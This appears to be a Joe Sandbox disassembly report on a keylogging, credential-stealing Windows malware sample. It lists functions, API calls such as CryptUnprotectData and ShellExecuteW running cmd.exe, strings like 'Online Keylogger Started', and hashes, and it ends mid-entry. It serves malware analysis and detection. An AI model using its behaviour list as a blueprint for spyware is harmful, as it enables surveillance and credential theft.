Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTime$wsprintf
String ID: Online Keylogger Started
API String ID: 112202259-1258561607
Opcode ID: b5fe0f5e80e9a9d7d9742089a16902ed0dc4484d36424d395f683e812b7c9929
Instruction ID: 28bbfba120e67fe9302c314101e9d6be38f8a9d2e5fa49f3fb55d6307d966583
Opcode Fuzzy Hash: b5fe0f5e80e9a9d7d9742089a16902ed0dc4484d36424d395f683e812b7c9929
Instruction Fuzzy Hash: 7F01C4A0A042083AE62076768CD6DBF7A6CCA92398B40047FFA45221C3D9B85C5586FE

Function 00448107 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,00452FD6,00000000), ref: 0044815D
GetLastError.KERNEL32(?,00000000,?,00452FD6,00000000), ref: 00448167
__dosmaperr.LIBCMT ref: 00448192

Strings

IT, xrefs: 00448121

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: IT
API String ID: 2583163307-2326920787
Opcode ID: 6b46bd80387a4c42d1e368ef137c45b3139bac899a2854b8375f5110eabc8c11
Instruction ID: bc407199021615a177a746a92b253f91ed1213c20eb266450d42f323bf4fb8fa
Opcode Fuzzy Hash: 6b46bd80387a4c42d1e368ef137c45b3139bac899a2854b8375f5110eabc8c11
Instruction Fuzzy Hash: 05014932A011641AF7247375A845B7F67494B81778F26026FFD0D8B2E2DF6C8C83815D

Function 00406071 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
GetProcAddress.KERNEL32(00000000), ref: 00406097

Strings

CryptUnprotectData, xrefs: 00406086
crypt32, xrefs: 0040608B

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32
API String ID: 2574300362-2380590389
Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794

Function 00418CCD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2

Strings

P0F, xrefs: 00418D01
alarm.wav, xrefs: 00418CDD
x(G, xrefs: 00418CFC

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: P0F$alarm.wav$x(G
API String ID: 1174141254-3464520750
Opcode ID: 9aa17c110c8bf40cab32959b0a671c41a4b05bcb2b2dcf8c9d3bf8259e27c33c
Instruction ID: fe962266bcbe9b481af3baecc2186877703bd5259ecc619923a55b1e0e4c82aa
Opcode Fuzzy Hash: 9aa17c110c8bf40cab32959b0a671c41a4b05bcb2b2dcf8c9d3bf8259e27c33c
Instruction Fuzzy Hash: 40019270B0430056C604F7A6E9566EE37958BA1358F00857FA849672E2EEBD4D45C6CF

Function 0040513C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
CloseHandle.KERNEL32(?), ref: 004051AA
SetEvent.KERNEL32(?), ref: 004051B9

Strings

Connection Timeout, xrefs: 00405178

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection Timeout
API String ID: 2055531096-499159329
Opcode ID: 92c3ac276b95bb479ae6f24dc06d48f0034506e05dd6b0855473c86a9f9fecf8
Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
Opcode Fuzzy Hash: 92c3ac276b95bb479ae6f24dc06d48f0034506e05dd6b0855473c86a9f9fecf8
Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49

Function 0040D1F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E

Strings

ios_base::badbit set, xrefs: 0040D21A
ios_base::eofbit set, xrefs: 0040D24D
ios_base::failbit set, xrefs: 0040D240

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
Opcode Fuzzy Hash: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F

Function 0044C257 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

_abort.LIBCMT ref: 0044C289
_free.LIBCMT ref: 0044C2BD

Strings

pF, xrefs: 0044C2B4
KS, xrefs: 0044C2C3, 0044C2CB

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ErrorLast_abort_free
String ID: pF$KS
API String ID: 289325740-4051209147
Opcode ID: 27a83d5959e399e126d66fc0e9bc80bad5e8b5edace6ebc33031c21e2b203fc3
Instruction ID: 681b650f5022ba5d363f9e5fe3477a26ea07511fc4476d54e9c473318faef7cf
Opcode Fuzzy Hash: 27a83d5959e399e126d66fc0e9bc80bad5e8b5edace6ebc33031c21e2b203fc3
Instruction Fuzzy Hash: 2701CC75D02A319BE7B19F9A944165AB760BF04710B1D025BF96473381D7FC29418FCD

Function 00414839 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B

Strings

/C , xrefs: 00414859
cmd.exe, xrefs: 00414870
open, xrefs: 00414875

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: b351c3cfc9a326bb6df570b2850a33e4d7494764cb46b01087834d94efe21cf7
Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
Opcode Fuzzy Hash: b351c3cfc9a326bb6df570b2850a33e4d7494764cb46b01087834d94efe21cf7
Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A

Function 0040C9CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18

Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430

__CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E

Strings

bad locale name, xrefs: 0040CA28

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
Opcode Fuzzy Hash: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699

Function 00412268 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C

Strings

P0F, xrefs: 0041226C, 0041228E, 0041226F

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: P0F
API String ID: 1818849710-3540264436
Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8

Function 0040A7F2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(00409305,00000000,h5S,0040BC76,?,00472200,pth_unenc,h5S), ref: 0040A801
UnhookWindowsHookEx.USER32(00000000), ref: 0040A811
TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,h5S), ref: 0040A823

Strings

h5S, xrefs: 0040A7F2

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: TerminateThread$HookUnhookWindows
String ID: h5S
API String ID: 3123878439-3923149170
Opcode ID: 8267290ba39d94e96aad68657565d8cdeaa2cc55df27e2dd61bae36986e01b15
Instruction ID: 1ea45cce1470398c8d9247cd1949440ee3d7e4d102938376389503cdeb19b454
Opcode Fuzzy Hash: 8267290ba39d94e96aad68657565d8cdeaa2cc55df27e2dd61bae36986e01b15
Instruction Fuzzy Hash: A4E01D711443456FE3105F606DD49157B5CE6083597514875B606531B1C67CCC88CB3D

Function 00448C13 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00448C9E
__alldvrm.LIBCMT ref: 00448E9F
__alldvrm.LIBCMT ref: 00448EC1

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 32cdc7c9dabc426cba1924f910902f1b98a76737f1ea6ce3ad05962b761c79b8
Instruction ID: 8a3f88530d83194aa24a517e4ef6e15a272d99a70002873db7a8ab856bdac54d
Opcode Fuzzy Hash: 32cdc7c9dabc426cba1924f910902f1b98a76737f1ea6ce3ad05962b761c79b8
Instruction Fuzzy Hash: 18A12572A012869FFB21CE18C8817AEBBA1EF65314F24416FE5859B382CA3C8941C759

Function 0043FD01 Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
Instruction ID: c1abd53b49e6a7723cad7358b49d7c046164203d86e3a19123cc85c40c5f12b7
Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
Instruction Fuzzy Hash: 93412871E00704AFD7249F79CC46B5A7BA9EB8C714F10523FF142DB681D37999498788

Function 0040AF4D Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040AF62
Sleep.KERNEL32(00001388), ref: 0040AFEA

Strings

[Cleared browsers logins and cookies.], xrefs: 0040B025
Cleared browsers logins and cookies., xrefs: 0040B036

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
API String ID: 3472027048-1236744412
Opcode ID: 53613c53924a86662ae771ff56641a82623ac4206652ba19a530518bfbc7e862
Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
Opcode Fuzzy Hash: 53613c53924a86662ae771ff56641a82623ac4206652ba19a530518bfbc7e862
Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F

Function 00411140 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004120E8: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128

Sleep.KERNEL32(00000BB8), ref: 004111DF

Strings

h5S, xrefs: 00411155
@8T, xrefs: 00411163
exepath, xrefs: 00411168, 004111A8, 00411229

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CloseOpenQuerySleepValue
String ID: @8T$exepath$h5S
API String ID: 4119054056-82665750
Opcode ID: c119e2e7c47949f47b2a13efb1dcc5748ecfbaa444f344b16444f4acc8e20871
Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
Opcode Fuzzy Hash: c119e2e7c47949f47b2a13efb1dcc5748ecfbaa444f344b16444f4acc8e20871
Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD

Function 004094FF Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E

Sleep.KERNEL32(000001F4), ref: 0040955A
Sleep.KERNEL32(00000064), ref: 004095F5

Strings

[ , xrefs: 00409576
], xrefs: 00409562

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: 7cb562bdbf99e03128c45281b0b0095e59bc95eda3a0ebde9d5d10b3a82eef2e
Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
Opcode Fuzzy Hash: 7cb562bdbf99e03128c45281b0b0095e59bc95eda3a0ebde9d5d10b3a82eef2e
Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F

Function 004197E0 Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON

Download Yara Rule

APIs

GetSystemTimes.KERNEL32(?,?,?,004724A0,?,?,00000000), ref: 004197F6
Sleep.KERNEL32(000003E8,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,0041588A), ref: 00419801
GetSystemTimes.KERNEL32(?,?,?,?,?,00000000), ref: 00419816
__aulldiv.LIBCMT ref: 0041987D

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: SystemTimes$Sleep__aulldiv
String ID:
API String ID: 188215759-0
Opcode ID: a10989dffdb38c1c471ca41a2490fa3084ff35cad8f91966e756ab2f281e4d8f
Instruction ID: 145d7891b6f1dee57345c91865aa58c1fa38592630094fdfab7f37f82c20bed6
Opcode Fuzzy Hash: a10989dffdb38c1c471ca41a2490fa3084ff35cad8f91966e756ab2f281e4d8f
Instruction Fuzzy Hash: 791160735443446BC308FAB5CC95DEB77ACEBC5388F040A3EF54682091EE39DA488BA5

Function 00440FB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
Instruction ID: ded37596ea74bb71ca552df42b40a6491f306b500b676c7390fdbb9d5d89f826
Opcode Fuzzy Hash: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
Instruction Fuzzy Hash: E801D1B220A2163EB6202E796CC9D27631DEF513BE725033BF521522E6EF7DCC855168

Function 00445A95 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

